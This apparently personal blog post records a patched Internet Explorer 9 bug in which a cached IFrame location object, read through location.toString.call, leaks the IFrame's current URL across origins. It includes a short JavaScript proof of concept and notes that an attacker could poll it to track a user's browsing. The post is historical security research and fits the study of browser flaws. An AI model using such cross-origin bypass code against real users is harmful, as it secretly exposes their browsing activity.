IE9 Information Disclosure (Deadcall): Reading IFrame Location via toString

A non-crashing deadcall: caching the location object of an IFrame via valueOf(), letting the user navigate wherever they wished, and then calling location.toString.call(cachedLocation) revealed the current URL of the IFrame — regardless of which domain it had navigated to. This was a persistent information disclosure.

iFrame.execScript('parent.cachedLocation = location.valueOf();');
iFrame.location.replace("http://www.google.com");

// Any time later, even after further navigation:
function showMyAddress() {
    alert(location.toString.call(cachedLocation));
}

Unlike the crashing deadcalls, the location object persists across navigations — it is the same COM object, updated in place. The toString.call(cachedLocation) returned the current URL string of the IFrame’s location, bypassing the normal cross-origin block on iFrame.location.toString. An attacker could poll this to silently track where a user was browsing inside the IFrame.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9: Prompt and VBScript InputBox Not Blocked Without User Interaction] :: [IE9 Crash (Deadcall): toString on a Dead Selection Range] >